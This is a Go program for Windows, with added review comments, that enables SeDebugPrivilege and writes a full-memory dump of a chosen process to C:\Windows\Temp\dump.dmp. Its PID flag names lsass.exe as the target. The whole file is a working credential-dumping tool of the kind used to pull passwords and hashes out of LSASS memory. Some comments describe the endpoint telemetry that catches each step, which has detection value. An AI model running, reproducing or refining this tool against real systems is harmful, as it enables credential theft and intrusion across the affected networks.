package main
import (
"flag"
"fmt"
"golang.org/x/sys/windows"
"log"
"syscall"
)
// Win32 constants used by this program. The numeric values are the SDK
// definitions; only the subset that is actually referenced below is declared.
const (
	// Process access rights (OpenProcess dwDesiredAccess bits).
	PROCESS_CREATE_PROCESS            = 0x0080
	PROCESS_CREATE_THREAD             = 0x0002
	PROCESS_DUP_HANDLE                = 0x0040
	PROCESS_QUERY_INFORMATION         = 0x0400
	PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
	PROCESS_SET_INFORMATION           = 0x0200
	PROCESS_SET_QUOTA                 = 0x0100
	PROCESS_SUSPEND_RESUME            = 0x0800
	PROCESS_TERMINATE                 = 0x0001
	PROCESS_VM_OPERATION              = 0x0008
	PROCESS_VM_READ                   = 0x0010
	PROCESS_VM_WRITE                  = 0x0020
	// CreateFile arguments for the output file (access, share mode,
	// creation disposition, attributes).
	GENERIC_WRITE         = 0x40000000
	FILE_SHARE_WRITE      = 0x00000002
	CREATE_ALWAYS         = 0x2
	FILE_ATTRIBUTE_NORMAL = 0x80
	// MINIDUMP_TYPE passed to MiniDumpWriteDump; 0x2 is MiniDumpWithFullMemory.
	DEBUG_WITH_FULL_MEMORY = 0x00000002
	// Composite of the process rights above. NOTE(review): despite the name
	// this is narrower than the SDK's PROCESS_ALL_ACCESS, which also folds in
	// the standard rights (including SYNCHRONIZE). A handle opened on a
	// sensitive process with a broad mask like this is the kind of process-
	// access event that endpoint telemetry commonly records.
	PROCESS_ALL_ACCESS = (PROCESS_CREATE_PROCESS | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_SET_INFORMATION | PROCESS_SET_QUOTA | PROCESS_SUSPEND_RESUME | PROCESS_TERMINATE | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ)
)
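// EnablePrivilege enables the named privilege (for example "SeDebugPrivilege")
// in the current process token.
//
// The privilege must already be present in the token: AdjustTokenPrivileges
// can only toggle privileges the account was granted, it cannot add new ones.
// Every failing step is returned as a wrapped error; the original version only
// printed a message (with Println, so the format verbs were never expanded),
// carried on with a possibly invalid token, and always returned nil. It also
// never closed the token handle.
//
// Enabling a sensitive privilege is an auditable token operation on Windows,
// which is why defenders treat it as a useful signal when it is unexpected.
func EnablePrivilege(name string) error {
	var token windows.Token
	// TOKEN_QUERY is required together with TOKEN_ADJUST_PRIVILEGES for
	// AdjustTokenPrivileges to succeed.
	if err := windows.OpenProcessToken(windows.CurrentProcess(), windows.TOKEN_ADJUST_PRIVILEGES|windows.TOKEN_QUERY, &token); err != nil {
		return fmt.Errorf("opening current process token: %w", err)
	}
	// The token is a kernel handle and must be released.
	defer token.Close()

	var luid windows.LUID
	if err := windows.LookupPrivilegeValue(nil, windows.StringToUTF16Ptr(name), &luid); err != nil {
		return fmt.Errorf("looking up privilege %q: %w", name, err)
	}

	privs := windows.Tokenprivileges{
		PrivilegeCount: 1,
		Privileges: [1]windows.LUIDAndAttributes{{
			Luid:       luid,
			Attributes: windows.SE_PRIVILEGE_ENABLED,
		}},
	}
	// NOTE(review): the raw API reports success even when the privilege was
	// not assigned (ERROR_NOT_ALL_ASSIGNED); the x/sys/windows wrapper is
	// expected to surface that as an error — confirm against the package
	// version in use.
	if err := windows.AdjustTokenPrivileges(token, false, &privs, 0, nil, nil); err != nil {
		return fmt.Errorf("enabling %s in current process token: %w", name, err)
	}
	return nil
}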
// main opens the process named by -pid, writes a full-memory minidump of it
// to a fixed path under C:\Windows\Temp through Dbghelp!MiniDumpWriteDump,
// and exits. The -pid help text names lsass.exe as the intended target; the
// sequence below (SeDebugPrivilege enable, broad-rights OpenProcess on that
// process, a MiniDumpWriteDump call from Dbghelp.dll, a .dmp file created in
// Temp) is exactly what process-access and file-creation telemetry is
// commonly tuned to record.
func main() {
	// Enable Debug Privs !
	// NOTE(review): the result of EnablePrivilege is discarded, so a failure
	// here only shows up later as an OpenProcess error.
	EnablePrivilege("SeDebugPrivilege")
	// flag.Parse runs after the privilege adjustment, so even "-h" or a bad
	// flag triggers it first.
	pid := flag.Int("pid", 0, "Process ID of lsass.exe")
	flag.Parse()
	// MiniDumpWriteDump is resolved lazily; NewLazySystemDLL restricts the
	// search to the system directory.
	dbghelp := windows.NewLazySystemDLL("Dbghelp.dll")
	MiniDumpWriteDump := dbghelp.NewProc("MiniDumpWriteDump")
	// NOTE(review): sa is zero-valued (Length is never set). CreateFile
	// appears to tolerate this, but passing nil is the conventional way to
	// say "no security attributes" — confirm.
	var sa windows.SecurityAttributes
	//get handle to process
	// A pid of 0 (the default) is passed straight through if -pid is omitted.
	pHandle, errOpenProcess := windows.OpenProcess(PROCESS_ALL_ACCESS, false, uint32(*pid))
	if errOpenProcess != nil {
		// log.Fatalf would avoid the Sprintf round-trip; the process exits here.
		log.Fatal(fmt.Sprintf("[!] Error calling OpenProcess: %s\n", errOpenProcess.Error()))
	}
	fmt.Println(fmt.Sprintf("[-] Successfully got a handle to process %d", *pid))
	//create dump file
	// The output path is hard-coded; CREATE_ALWAYS silently overwrites an
	// existing file there.
	path := "C:\\Windows\\Temp\\dump.dmp"
	fHandle, errCreateFile := windows.CreateFile(syscall.StringToUTF16Ptr(path), GENERIC_WRITE, FILE_SHARE_WRITE, &sa, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0)
	if errCreateFile != nil {
		// The underlying error is not included in the message, only the fact
		// that the call failed.
		log.Fatal(fmt.Sprintf("[!] Error calling CreateFile\n"))
	}
	// fHandle is never closed explicitly; it is released when the process exits.
	fmt.Println(fmt.Sprintf("[-] Successfully got a handle to file %d", fHandle))
	PID := uintptr(*pid)
	//dump memory with minidumpwritedump
	// Argument order follows the API: hProcess, ProcessId, hFile, DumpType,
	// ExceptionParam, UserStreamParam, CallbackParam. The first return value
	// is the BOOL result; the syscall error in the third position is dropped,
	// so a failure below cannot report its cause.
	success, _, _ := MiniDumpWriteDump.Call(uintptr(pHandle), PID, uintptr(fHandle), DEBUG_WITH_FULL_MEMORY, 0, 0, 0)
	//if errMiniDump != nil {
	if success == 0 {
		log.Fatal(fmt.Sprintf("[!] Error calling MiniDumpWriteDump:\n"))
	}
	fmt.Println(fmt.Sprintf("[-] Dump Completed: %s", path))
	//close handle to process
	// The CloseHandle error is ignored; only the process handle is closed here.
	windows.CloseHandle(pHandle)
}